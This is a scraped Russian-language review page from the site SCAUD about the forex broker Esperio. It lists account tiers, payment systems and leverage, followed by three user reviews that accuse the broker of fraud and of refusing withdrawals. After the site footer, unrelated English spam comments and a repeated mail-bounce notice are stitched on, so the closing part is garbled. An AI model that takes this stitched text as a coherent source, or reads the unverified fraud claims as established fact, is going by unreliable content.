Для VIP-клиентов доступно три статуса программы — VIP, GOLD и DIAMOND. Esperio присваивает статусы при пополнении депозита на 50, 100 или 500 тыс. USD соответственно.
Пополнение счета и вывод денег от Esperio
Для зачисления и списания средств Esperio использует карты (Visa/ MasterCard), банковские переводы и систему электронных платежей. Для пополнения торгового счета доступны платежные системы: NETELLER, PayPal, LiqPay, Piastrix Wallet, Thailand Local Bank Transfer, WebMoney, Sepa & swift, WebMoney, QIWI, FasaPay.
Компания анонсирует возможность компенсации комиссии платежных систем путем ее зачисления на баланс торгового счета.
Детальная информация о выводе средств не представлена.
Заключение
Esperio предлагает низкие спреды и конкурентные свопы. Минимального порога входа нет. Пополнить счет и вывести деньги можно с помощью наиболее популярных электронных платежных систем. Преимуществом является высокое кредитное плечо – до 1:1000 и большой выбор торговых активов. Компания работает на платформе Metaquotes. Доступные терминалы: МТ4/5.
Часто задаваемые вопросы
Как получить максимум информации о компании ?
Обзоры, разоблачения, статьи в блоге — в вашем распоряжении бесплатная и актуальная информация на scaud. Вы также можете запросить понятный детальный отчет по любой финансовой компании — оставьте заявку на главной странице нашего сайта.
Как отличить официальный сайт от ресурса мошенников?
Какие отзывы о компании правдивые, а какие — фейки?
Как проверить компанию на признаки мошенничества?
Как выбрать надежную финансовую компанию?
Оставить отзыв
Используйте данную форму для того, чтобы оставить отзыв о компании. Все комментарии, не касающиеся продукта, будут удалены!
Имя
Ваше имя
Email
Ваша электронная почта
Телефон
+380
39 123 4567
Ваша оценка
Текст отзыва
Введите текст отзыва
Отзывы о Esperio
Деревлев Андрей
09.12.2021
2
Для меня сотрудничество с Esperio оказалось провальным. Благо все обошлось небольшой суммой, какие-то копейки поначалу удалось вывести, то сумма вклада осталась у этих мошенников, никакой обратной связи и тем более качественной поддержки у них нет. Это все пыль в глаза, дабы прикарманить Ваши и мои в том числе деньги((((
Иван Иванович
07.12.2021
1
Пробовал работать. Не знаю у кого там с выводом денег все норм., я ничего вывести не смог. Скорее всего отзывы пишет сам брокер. Картинка конечно красивая, предлагает большое количество инструментов и рынков для торговли, доступные спреды на сделки. Порог входа - нулевой, достаточно низкие спреды. Но это все сказки для неопытных. Самый обычный развод!
Константин Петров
02.12.2021
2
Не спорю MT4 сама по себе качественная торговая платформа. Но в руках мошенников это всего лишь обманный ход. Заявляет, что поддерживает работу фактически со всеми торговыми инструментами. Только смысла нет, если контора работает только на ввод.
Проверьте брокера Esperio на надежность
Узнайте о рисках инвестирования
Похожие компании
Europe Markets
Europe Markets icon
MoveProfit
MoveProfit icon
Finrise
Finrise icon
Ember Fund
Ember Fund icon
Acy Securities
Acy Securities icon
Prime Investment
Prime Investment icon
Вам может быть интересно
Брокер GU Arex — сайт-однодневка, созданный мошенниками для хищения денег
Quickeliquid — новоиспеченный лохотрон, созданный опытными мошенниками
Как брокеры-мошенники обманывают людей?
Tryton – очередной мошеннический проект с обманом на деньги
Показать все
СООБЩИТЕ О МОШЕННИЧЕСТВЕ
Название
Введите название компании
Сайт
Скопируйте адрес сайта для проверки
Имя
Введите ваше имя
Email
Введите ваш адрес электронной почты
Телефон
+380
39 123 4567
Я даю согласие на обработку персональных данных.
О проекте
SCAUD – медийный проект об онлайн-заработке. Команда экспертов проводит комплексные обзоры финансовых компаний и выявляет мошеннические схемы. Мы стремимся оперативно реагировать на запросы пользователей. Наши цели – повысить уровень безопасности на финансовых рынках и сообщить о по-настоящему прибыльных проектах.
Получайте первым новые обзоры
Ведите ваш email
Нажимая на кнопку "подписаться", я даю согласие на обработку и хранение моих персональных данных
Политика конфиденциальности
Банковские услуги
Банки
МФО
Чарджбэк-компании
Инвестиции
Форекс
Бинарные опционы
Хайпы
Криптовалюта
Кошельки
Биржи
Обменники
Страхование
Недвижимость
Жизнь и здоровье
Бизнес
Азарт
Казино
Букмекеры
Регулирующие органы
Государственные регуляторы
СРО
Офис
Москва, район Орехово-Борисово Южное, Ясеневая, 26
Способ связи с нами
Напишите на почту admin@scaud.info
2020 © SCAUD Вся информация на scaud представлена в информационных целях и отражает частное мнение экспертов.
Поделиться142022-07-21 23:23:19
I am not sure where you’re getting your information, but great topic. I needs to spend some time learning much more or understanding more.
Thanks for great information I was looking for this information for my mission.
Поделиться152022-11-08 09:08:58
A message that you sent could not be delivered to one or more of its
recipients.
recipients.
recipients.
recipients.
recipients.